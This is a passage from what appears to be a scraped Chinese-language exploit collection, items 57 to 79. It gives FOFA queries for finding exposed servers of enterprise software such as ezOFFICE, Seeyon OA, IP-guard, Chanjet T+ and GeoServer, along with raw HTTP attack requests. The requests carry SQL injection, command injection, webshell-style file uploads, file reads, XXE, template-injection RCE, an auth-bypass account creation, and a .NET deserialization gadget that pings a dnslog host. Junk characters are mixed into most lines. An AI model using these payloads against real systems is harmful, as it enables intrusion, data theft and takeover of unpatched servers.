"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
& E+ a7 U0 Q! u/ p" r& e ^: c0 \# u "MethodName":"Start",; n9 `3 W7 t6 K7 h
"ObjectInstance":{
8 V* X/ _2 z- {, P3 i$ } "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
2 m6 \9 ?# }* a2 p3 H4 T "StartInfo": {: A6 x! n8 A$ L3 X7 Q
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
: h" ?6 o! F g& _* M "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw" R1 K6 Q0 C) b4 m# n# \# A
}
; w+ Y: E& d. A, m8 I) a3 @ }& H+ y3 C! w1 w6 O0 N8 H' I
}( v3 q1 y+ k4 k7 ]. K
}! m( Q& ^ I( e+ z5 O: @
6 T: F8 B* {8 {# p6 u$ L& _
5 G9 q& o& z, k57. 畅捷通T+ keyEdit.aspx SQL注入
. _# j c2 g/ g# c0 l/ o8 ?- k4 OFOFA:app="畅捷通-TPlus"! ^0 J8 H* v; k) E
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1! a3 Q1 z' T5 c' K: N
Host: host# i2 z: a- @- o4 |- U
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
1 @# ], [! _& t: EAccept-Charset: utf-8
( g/ [0 u+ N3 W! {6 W0 f0 ~8 u" wAccept-Encoding: gzip, deflate
7 h: E- D8 l) eConnection: close
( S5 A; v; r$ B/ z
& K5 c* V! _/ r" c! ^) x3 Z' f/ \; x* a$ D& C1 H
58. 畅捷通T+ KeyInfoList.aspx sql注入
$ {0 k6 _2 V% N* q- h0 sFOFA:app="畅捷通-TPlus"7 W6 p, k3 T5 C
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
1 J( j9 h) A( D" ]# O# ?3 s* pHost: your-ip% C- B* \4 x* U- g
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
" y. t1 x) `. o: mAccept-Charset: utf-8- i& K" c0 u. [) E' q4 l
Accept-Encoding: gzip, deflate W) ?1 L6 ^# A7 F) _
Connection: close
( ?8 g5 R9 n' S% J6 S+ A9 o# B, z6 }! Z5 |# D5 ?+ F
! ^: i' F9 ~# h4 o" M( Y" b59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
) a! x o' C9 ?FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"2 D0 l" i" \' u
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
3 z. P6 O$ X! ?- w* g# X! EHost: 192.168.86.128:9090
& o6 b+ S/ }- V0 R$ Z' X; TUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.362 `+ n$ N4 q# f! ^/ Z- w
Connection: close
) l# Z9 C* Y% X+ wContent-Length: 16694 k9 ^6 h4 f0 w1 W Q0 J
Accept: */*
" C6 D& t* f n( u8 d% _Accept-Language: en
7 V' E: k' e1 A( f" `6 f5 qContent-Type: application/x-www-form-urlencoded8 s# p& I- V' I4 t
Accept-Encoding: gzip
4 @1 s7 q" q3 E. g! }# z, J
" K; H& k# v; i* T5 }, M% CPAYLOAD. h, k* ?# z k) T5 S% |
9 p$ _- p, k( ]* |# J) L h
% P Y$ ^; d. e; M' F9 m60. 百卓Smart管理平台 importexport.php SQL注入6 ?7 u+ ]' V2 _( \2 B* l5 s
FOFA:title="Smart管理平台"
8 I% U! ^% s. v1 uGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1$ z7 }6 y, E+ u7 n
Host:
/ O3 ^, \; L/ |9 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 b- i1 T1 k' p: zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" m8 \; F3 t: [1 oAccept-Encoding: gzip, deflate8 q7 W8 b- ?4 r8 h( |. H" p% i- j
Accept-Language: zh-CN,zh;q=0.9
- j0 D' Q+ ]- o0 [Connection: close& M6 t, }8 e: b6 w3 E2 Y
1 C% I8 ^0 Q0 U0 M8 {5 o
I/ d* ?( p( C$ _" ^- l61. 浙大恩特客户资源管理系统 fileupload 任意文件上传+ H0 ^: ?- ?2 q
FOFA: title="欢迎使用浙大恩特客户资源管理系统"0 h& b8 X, k, X: W1 c( ?
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1$ ^0 H5 m' j. Y$ i
Host: x.x.x.x y, }6 e$ [8 Y6 W& L t4 ?. I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ y7 _* r; H$ z
Connection: close
" x( ? I$ M& ~, SContent-Length: 27* n3 @2 z& y7 ~0 {. g! I4 v+ q
Accept: */*! f* U; N! D* j9 G( F& \: V- I
Accept-Encoding: gzip, deflate) d4 @7 b2 u! Z3 y3 O
Accept-Language: en" `+ }: o3 E! \# ?4 U( _
Content-Type: application/x-www-form-urlencoded0 f7 H3 V2 d% k& k/ [3 q7 N
6 ~7 S7 H' e8 {
8uxssX66eqrqtKObcVa0kid98xa
7 l5 i+ f$ \; v9 _+ N+ n
" G3 `( n2 p& }0 ~6 Z
# F4 R. M; Z9 p/ i1 o4 b; x62. IP-guard WebServer 远程命令执行
9 [- O8 }6 Q& uFOFA:"IP-guard" && icon_hash="2030860561"
7 d* N" N% @5 t/ Q% ]GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1( `$ w9 I, K$ J
Host: x.x.x.x# X* n. u: Y E/ e3 H0 f
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36# w5 M. B! X0 V0 I
Connection: close0 g: \! h8 _4 I. m! s9 ?3 ?
Accept: */*% t& N. @6 B% O8 q% O i
Accept-Language: en
. k1 v2 l$ \$ y/ wAccept-Encoding: gzip' J2 k% k- o1 X9 Y# A2 |' T
0 T; m2 e- V/ D! G/ |9 l
: Z: w3 z9 I5 E3 s访问
! U. ^" L- _+ ^ s/ z. r" ~( a, e8 A0 G9 H! D5 q2 I
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
9 E2 q( a$ T0 D, cHost: x.x.x.x
: ]! ^1 P# g, }: z! R2 M1 ]) T9 s( N$ `9 W, ^, K
, c4 q$ ^2 Q9 @& \0 N7 g63. IP-guard WebServer任意文件读取$ c, A' T9 l4 j4 p" t* ^
IP-guard < 4.82.0609.0# p5 |) C' [" ^: E
FOFA:icon_hash="2030860561"0 J' J% e+ G' W, \0 \, S. {" b
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
/ A3 `4 r8 A7 KHost: your-ip/ k7 u! q( b! z$ U; v* m& u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36+ h0 u4 S9 [4 G7 `* A! E# N$ h1 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ o1 T4 q+ ^8 `* R) Y6 X+ QAccept-Encoding: gzip, deflate. G) k F# c+ _. C+ o
Accept-Language: zh-CN,zh;q=0.94 I8 ~! G( r& a3 q( v3 f4 f
Connection: close+ p5 l! ?) H5 e! `
Content-Type: application/x-www-form-urlencoded- } M+ N1 L: @ `/ y- [' I
! k3 {% U: e, C3 k7 ~- y& O* F2 X- qpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A, B% O) a% ^0 `6 N( w$ b- N" n9 h! c
$ Z6 B, W$ ~0 N3 y7 g f# Q
64. 捷诚管理信息系统CWSFinanceCommon SQL注入; R/ f, T; S( i
FOFA:body="/Scripts/EnjoyMsg.js"1 @2 C- c8 \5 A% Y
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
$ Z$ Y- ~, W. N, r, D% d. NHost: 192.168.86.128:9001
4 X" C8 w8 @9 f- B" W# ZUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 g9 f& Y4 T6 y k# W# W* P' l
Connection: close
4 [1 u2 Z4 ?* a( `5 {! kContent-Length: 3692 H5 E7 F: y5 ]& T1 a
Accept: */*
& c% a( }* z4 ?. X7 |Accept-Language: en
- \4 H- s& E7 J/ Y y% P' H& Y' C" IContent-Type: text/xml; charset=utf-8
. e% ?9 m' V2 p( aAccept-Encoding: gzip8 g0 b" \0 d5 t3 C( t( O
( K! ~1 P! ]! j' Z2 {, [
<?xml version="1.0" encoding="utf-8"?>
5 T* l) y! f j! Q4 d: h<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">2 G/ n3 D6 p+ {1 i
<soap:Body>5 `9 M8 `8 t5 f& H
<GetOSpById xmlns="http://tempuri.org/">( Z/ ]! t+ l5 [/ E1 n$ H( f [
<sId>1';waitfor delay '0:0:5'--+</sId>
( s: {* @0 C) M: V3 f. W* @ </GetOSpById>
9 X! k3 f5 E( ~. N+ F </soap:Body>" t' \/ p; a. S7 u
</soap:Envelope>
6 i! @6 ?1 v5 M+ {& {1 b! Q# U* \$ z6 \, f
; u) T# z {5 s2 U2 [
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过' q3 z) b* G7 c4 r+ r5 p
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
9 S) ?6 l! ?: p) |6 j6 g) _响应200即成功创建账号test123456/123456
8 A$ _& N% n# ^% WPOST /SystemMng.ashx HTTP/1.1
' ^7 \, {$ e* B5 m. RHost:( G- i6 Y2 E. d' p
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)1 I, d6 ]( `% _8 v
Accept-Encoding: gzip, deflate
( B5 u/ x5 m3 |: K2 aAccept: */*# Z Y' y5 M0 ?. e
Connection: close2 Q( c8 q: w% V, ^: ]5 E# n+ o
Accept-Language: en9 n9 {4 z; V/ W# @1 v
Content-Length: 174
. m5 P& Q1 i* H$ ?3 M& Z
, ?+ |1 c# z! Y! _- F/ ]7 roperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
3 ^6 T6 E- P/ l" p. a# O8 t7 M% v( X
, _. K1 [; e# I
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
4 g: B* ?; h M' B5 M3 i# P; YFOFA:app="万户ezOFFICE协同管理平台" v" X/ _( f# z" t. w! J
2 S: M7 P3 Q% fGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
7 W3 }0 B* m, W- p" J' THost: x.x.x.x% o: ?- i/ p% c: B4 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
% q* t8 r% h/ {& J. g# pConnection: close
1 F% d6 F8 V X9 E' f9 d) y+ TAccept: */*1 U0 \. I2 p1 E6 b& |
Accept-Language: en4 {, v% w* ?. `
Accept-Encoding: gzip, V' N) M5 W1 Z: x# j, W1 U2 @
l$ h0 z% a" r8 ?% ~& L, j" a2 G+ V W: p5 u7 v. O
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
3 _6 n. n Z5 \7 c% A- D9 A4 ?
3 G; T. g- s5 k: E67. 万户ezOFFICE wpsservlet任意文件上传
% u- q2 G- ?$ h' b1 BFOFA:app="万户网络-ezOFFICE"2 V6 C7 w, Z! I" Y9 M/ f
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型& f" ]2 z7 P$ _, N/ U- Y r
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
; |7 p. U+ F* g7 K fHost: x.x.x.x& _' q8 j+ ?7 k, }1 w0 V- Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0- V% k. U0 C* M0 `1 {! m* c
Content-Length: 173
# R& U$ H) o1 z% @' ]% x8 Q* EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8. F( \7 C% ^! Q" L9 s" x5 F
Accept-Encoding: gzip, deflate
( y# F5 H& w' _. T$ c* I# g+ H1 nAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
: I9 V2 s; d( l, s3 R- kConnection: close$ P% ~" S4 l: Z& n5 b7 f' C
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp) o7 j3 N9 d& ?* [) K
DNT: 1/ k" L; O7 Q& g6 o9 v
Upgrade-Insecure-Requests: 1
2 }; y5 ]- l% W* H$ Q
( @ E) k0 G/ f1 a- s m! i--ufuadpxathqvxfqnuyuqaozvseiueerp' N# u- a. _& }
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
$ J) ?8 ^0 p; M2 X+ Q& }' T1 d) C) N
<% out.print("sasdfghjkj");%>
+ I q; T& X8 q, P. X R' I--ufuadpxathqvxfqnuyuqaozvseiueerp--
: {; o* z( }2 Q' p8 x8 k' n
/ y h9 i2 t' d! E7 @3 I5 ], ~. f4 x3 M" P5 G+ K9 ^. o
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp% i7 S* l; P2 E2 Y) {% O' U
1 ^: @; d" x l: V o7 f$ W68. 万户ezOFFICE wf_printnum.jsp SQL注入1 {' l$ I' o6 l( H! V
FOFA:app="万户ezOFFICE协同管理平台"
8 b- @0 K2 ^( u8 f6 JGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
9 D+ S/ J( y4 o9 p' Y( f& MHost: {{host}}$ s7 d3 w0 e3 P$ U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36! k! B. A. H i* q
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
# V7 K9 w( y& Z4 H# d; p& fAccept-Encoding: gzip, deflate. v$ {5 J( s) D- k, T
Accept-Language: zh-CN,zh;q=0.9
: I2 D6 l+ B$ n1 gConnection: close
' I) x; v1 |" }
0 \6 ]3 C( e% ~, ]/ f& F, c( }) w2 G8 ]& H
69. 万户 ezOFFICE contract_gd.jsp SQL注入
- z5 x1 E$ h$ C' I0 {& zFOFA:app="万户ezOFFICE协同管理平台". b$ ?4 q8 d/ a$ E
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
, x% V5 A' r' m+ SHost: your-ip# e( s5 u, e( q. U
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 b. k6 t0 ^. wAccept-Encoding: gzip, deflate- ^0 I6 W/ u/ E6 Z6 F c
Accept: */*: @9 S( B2 L9 i8 Z+ e
Connection: keep-alive3 q) [+ `1 ?# D$ o; C$ a
0 m2 Y6 U4 x4 o0 m
, y" L! e# ?; F8 @5 E70. 万户ezEIP success 命令执行$ ]: j; Y" V3 K* C: j2 M7 x
FOFA:app="万户网络-ezEIP"0 K( W8 z- y7 Z8 s
POST /member/success.aspx HTTP/1.1: }; c5 L( u- _) \! _
Host: {{Hostname}}* x; V: [& _) a: z, M# i* p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36# O. ]3 w& K" ?2 A4 t. g0 ~
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
6 g9 z: v7 @% f! g V6 T7 xContent-Type: application/x-www-form-urlencoded
I5 p+ a9 n; m' s; i9 t0 sTYPE: C
! y1 |3 `9 p6 U4 gContent-Length: 16702% }0 u+ ?. H, l: d, y2 z; Y% S
. g* V2 E( r$ \: w% i3 u__VIEWSTATE=PAYLOAD
" E; n8 a: \, _$ F7 z" w
" z0 k! T9 @) `) c$ Q/ w$ s6 @1 _( S1 w- t: k) p+ B( w
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入5 n/ |' q7 q" s/ x& c7 b' G: `
FOFA:body="PM2项目管理系统BS版增强工具.zip"
6 X& d/ `6 O( iGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.19 J* \/ |( p; k' q
Host: x.x.x.xx.x.x.x6 J( S- p" Z5 }3 A& Q! V
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
- d* N. E H* I) vConnection: close
/ [+ ~5 }6 L4 H; D5 i3 {% gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 D. b5 I3 b7 ]3 F% y% b! X
Accept-Encoding: gzip, deflate2 E: H# j0 A7 I [& D$ C- C- f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- f$ x* n6 S+ R: L& E/ ?, V' _Upgrade-Insecure-Requests: 1
' ]) C9 I. t6 |0 ~7 K, `+ p
0 u6 _7 `2 x- P; O% ]
- S1 m3 \% y+ C! d* ?3 }# ^1 [0 E72. 致远OA getAjaxDataServlet XXE# I* j" Y0 M7 `; t& a3 k; E
FOFA:app="致远互联-OA"( g- I* A9 d4 u# f
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.11 ?" ]& N% `5 M6 t3 m# j# L
Host: 192.168.40.131:8099
! \$ X% _1 v* V# cUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
8 Q0 z6 B( o* q" q- z$ \$ [Connection: close6 C# S5 p7 C' l$ z/ S# K
Content-Length: 583% Z1 t3 t) q, K8 x# H
Content-Type: application/x-www-form-urlencoded
! U: \5 W* F- V% y" |+ w+ \ u9 ~Accept-Encoding: gzip/ E8 ]+ Q- f; i! @# G% K
, d r. G; s8 @2 [4 S5 b. V k# w
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
& F4 O8 w$ s, U& X2 @+ g# k! S* y' u! T# ^. u; R! p; ]
! B! u0 k$ f; C* g
73. GeoServer wms远程代码执行7 g" h) R; _- o0 K
FOFA:icon_hash=”97540678”' d0 _1 L, f$ i7 k* _) m0 W7 e
POST /geoserver/wms HTTP/1.1
* [; Z$ J8 f7 x1 t! pHost:
7 m) U. Z3 J. XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
2 B4 {/ Q: z% OContent-Length: 1981
# e9 Y: E: v/ q1 ?Accept-Encoding: gzip, deflate" [% |: T T9 R) y2 x
Connection: close1 q2 E2 C+ j+ \; v
Content-Type: application/xml
2 ]7 v$ J% @( Z$ {SL-CE-SUID: 3
) W, j, \# O# ~7 ]% `- u- q" R( L3 e; |, Q( v# u+ j9 k/ X
PAYLOAD
! {9 q0 f, Y/ N2 ^) r$ Y+ j: \5 N" b9 i' B" Z, d
% h. B% T" f& a% P
74. 致远M3-server 6_1sp1 反序列化RCE
6 N& c; \7 R1 b! t+ Q$ \) [* ^FOFA:title="M3-Server"
/ x) N2 \; Q, k1 H8 E" FPAYLOAD' ?$ X' i( i; P8 m. B( {! i% s
" A. D- B. n0 |0 d& @8 t. u' [7 c! w0 g75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE: } B9 r! O# C$ j) s9 |1 c
FOFA:app="TELESQUARE-TLR-2005KSH"
! S6 e8 L2 U; w( t1 f' h5 e8 RGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
& L- i, c+ G; k, z/ H& cHost: x.x.x.x
4 p6 l5 j# \' _* UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ c0 _: |% q- e, z5 ~Connection: close
- k6 A( I9 y3 {Accept: */*
7 |6 e5 N# P3 z s( |$ ^Accept-Language: en
/ r) a3 B7 `3 XAccept-Encoding: gzip% O3 M8 W% A t
; N+ o$ Y4 j2 l: @
( N$ `9 G5 s: }3 wGET /cgi-bin/test28256.txt HTTP/1.1
* J+ [4 Z0 X5 W# K2 J2 ZHost: x.x.x.x* A! ?; [+ v8 M. A* q$ Z4 ?& f
0 n( ^1 K, D0 V' o$ Q- w4 [+ O% H/ W8 u+ f8 a* |
76. 新开普掌上校园服务管理平台service.action远程命令执行
( ^& s1 h t2 a& _) h+ PFOFA:title="掌上校园服务管理平台"
5 P; K) n3 ]2 k/ D3 H8 n# M/ {POST /service_transport/service.action HTTP/1.1
7 z& \6 ~% k2 j- JHost: x.x.x.x% C, f+ X- b( e( r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
2 z% R8 S: e% P" W. L9 eConnection: close
4 c! q; T4 a, g2 z: l6 o, }) IContent-Length: 211
- _6 \) n6 W N J S3 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 A. |8 R. O4 ]# R( b9 u+ \; kAccept-Encoding: gzip, deflate
- s" n+ H& U$ k+ A- NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 P& b4 k. R* ]
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
2 X1 U* S2 k1 p$ ^Upgrade-Insecure-Requests: 1$ D% Y5 Q0 L- N9 e. P4 V
! F3 H j5 q' c4 c) S, M{
! e4 G( B0 ^) _"command": "GetFZinfo",8 O; j" n3 @* G! T; U% W
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"& c% J$ B. ]- p; w
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"- u% G. b1 h: J: O, W$ ?6 M! W
}
6 f$ A/ g, ^" j( X$ X z; @ s' O5 Z
3 V% |, f; s3 u7 a! \" H9 ^
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.19 R+ I4 U% I1 n& M) a
Host: x.x.x.x$ [: L }) _! Y9 x6 u
! t; r5 C/ F$ ^ E( w4 T+ q" X6 N) o0 r
& N. Z" M, H% ]/ T1 p77. F22服装管理软件系统UploadHandler.ashx任意文件上传4 Q# m" m% J4 g6 R
FOFA:body="F22WEB登陆"
: H) ^1 p# V2 Y3 B* QPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.14 ]/ ?# ]' P" ?" Y
Host: x.x.x.x1 ~7 s% n+ Q) F* r6 B H) g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36! R- l7 m. `% Z3 t' c
Connection: close9 b0 f9 l% d/ g% c$ T' a4 Q. e
Content-Length: 433
; W% `/ o$ S$ A5 f9 H9 i0 pAccept: */*
5 ~; n7 b, p3 UAccept-Encoding: gzip, deflate
( y7 V# h. ], e+ {8 _Accept-Language: zh-CN,zh;q=0.9
8 V" ?, C0 u% I, S9 @" eContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
! [! L4 h4 q) i6 o% t- o8 l( @' U. n4 X8 G
------------398jnjVTTlDVXHlE7yYnfwBoix
0 B. [/ E0 ?" IContent-Disposition: form-data; name="folder"
. G2 T6 \ g! G
( u2 B' Z1 |6 n# x/upload/udplog
9 B# W. C: y" ^5 ~1 }( @------------398jnjVTTlDVXHlE7yYnfwBoix
D" n% H, K* w$ W5 l$ WContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
' G7 ^( @. ?1 ^5 v4 ^Content-Type: application/octet-stream: O1 i% b u" W( E6 `
) [2 X" C) F, X6 T5 f: W
hello12345672 _1 Y' _" }/ \+ x1 W
------------398jnjVTTlDVXHlE7yYnfwBoix7 e$ K0 L/ O' S* c7 o, p+ `
Content-Disposition: form-data; name="Upload"
% `# u0 |7 P$ {8 b- q( p0 o e9 ~
% D6 Z" G. I0 d9 m- FSubmit Query
3 ~# E( f6 s6 `& `% n8 F/ e------------398jnjVTTlDVXHlE7yYnfwBoix--
$ D! x& g. `+ X0 C( X+ b$ N$ g9 m; o! A0 R
# O Y* }, Y u) s. C7 n78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传& G& W5 W7 q2 Z. k
FOFA:icon_hash="2001627082"
4 `) R' |" [* m5 OPOST /Platform/System/FileUpload.ashx HTTP/1.1: @0 ^/ w" K Y
Host: x.x.x.x* T: e& T! @) G. S0 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: F. B1 d( E2 c( M; o6 d
Connection: close+ s" ~+ u/ J* ?8 R) ]
Content-Length: 336/ F+ P; y3 Y- p6 E1 @+ B* n/ a \
Accept-Encoding: gzip
0 L( ?6 C; M$ Y: S5 P9 `Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l7 e M; d `) q5 _
7 r7 }. e2 Q- }+ { I& _------YsOxWxSvj1KyZow1PTsh98fdu6l
- ~5 ~2 o6 u% d4 d# U1 ?Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
; x# P9 r3 m1 f2 }Content-Type: image/png
! E8 Y3 f" H) N2 _
/ \ [% L4 L! l; LYsOxWxSvj1KyZow1PTsh98fdu6l1 R% [4 t: I$ }
------YsOxWxSvj1KyZow1PTsh98fdu6l
$ r& S: ~1 g& k0 o0 {" }) sContent-Disposition: form-data; name="target"
! K- B$ n- k& y# H4 i) n5 l% n7 G6 v. j. w
/Applications/SkillDevelopAndEHS/. u( f9 \$ U6 A6 V+ g1 |+ M
------YsOxWxSvj1KyZow1PTsh98fdu6l--
* S7 a1 M. Y. B* d" ]! L0 u
% M% Q. {$ ^, N! x; J5 Z7 v; \; M# {9 \, Q. V* V
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
0 f2 G' [) ~+ \Host: x.x.x.x
9 d; z, n$ K% k" y. C- }, G' N( ]4 i) D i1 `' ]
; g7 w& D. | R$ t9 M79. BYTEVALUE 百为流控路由器远程命令执行8 B$ w' u. v7 o: ]" c5 H
FOFA:BYTEVALUE 智能流控路由器
